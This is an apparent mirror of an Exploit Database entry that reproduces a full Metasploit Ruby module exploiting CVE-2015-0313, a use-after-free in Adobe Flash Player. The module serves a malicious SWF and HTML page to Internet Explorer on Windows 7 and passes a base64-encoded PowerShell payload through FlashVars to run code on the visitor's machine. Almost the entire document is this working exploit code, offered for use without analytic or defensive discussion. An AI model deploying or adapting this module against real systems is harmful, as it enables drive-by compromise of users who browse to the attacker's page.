Adobe Flash Player – ByteArray With Workers Use-After-Free (Metasploit)

• Exploit Database
• 55 阅读

• 作者： Metasploit
  日期： 2015-03-31
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36579/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer
  
  def initialize(info={})
  super(update_info(info,
  'Name'=> 'Adobe Flash Player ByteArray With Workers Use After Free',
  'Description' => %q{
  This module exploits an use after free vulnerability in Adobe Flash Player. The
  vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
  is freed from an ActionScript worker, who can fill the memory and notify the main
  thread to corrupt the new contents. This module has been tested successfully on
  Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.
  },
  'License' => MSF_LICENSE,
  'Author'=>
  [
  'Unknown', # Vulnerability discovery and exploit in the wild
  'hdarwin', # Public exploit by @hdarwin89 (all the magic)
  'juan vazquez' # msf module
  ],
  'References'=>
  [
  ['CVE', '2015-0313'],
  ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'],
  ['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'],
  ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/']
  ],
  'Payload' =>
  {
  'DisableNops' => true
  },
  'Platform'=> 'win',
  'BrowserRequirements' =>
  {
  :source=> /script|headers/i,
  :os_name => OperatingSystems::Match::WINDOWS_7,
  :ua_name => Msf::HttpClients::IE,
  :flash => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
  :arch=> ARCH_X86
  },
  'Targets' =>
  [
  [ 'Automatic', {} ]
  ],
  'Privileged'=> false,
  'DisclosureDate'=> 'Feb 02 2015',
  'DefaultTarget' => 0))
  end
  
  def exploit
  @swf = create_swf
  super
  end
  
  def on_request_exploit(cli, request, target_info)
  print_status("Request: #{request.uri}")
  
  if request.uri =~ /\.swf$/
  print_status('Sending SWF...')
  send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
  return
  end
  
  print_status('Sending HTML...')
  send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
  
  def exploit_template(cli, target_info)
  swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
  target_payload = get_payload(cli, target_info)
  psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
  b64_payload = Rex::Text.encode_base64(psh_payload)
  
  html_template = %Q|<html>
  <body>
  <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
  <param name="movie" value="<%=swf_random%>" />
  <param name="allowScriptAccess" value="always" />
  <param name="FlashVars" value="sh=<%=b64_payload%>" />
  <param name="Play" value="true" />
  <embed type="application/x-shockwave-flash" width="1" height="1" src="https://www.exploit-db.com/exploits/36579/<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
  </object>
  </body>
  </html>
  |
  
  return html_template, binding()
  end
  
  def create_swf
  path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
  swf =::File.open(path, 'rb') { |f| swf = f.read }
  
  swf
  end
  
  end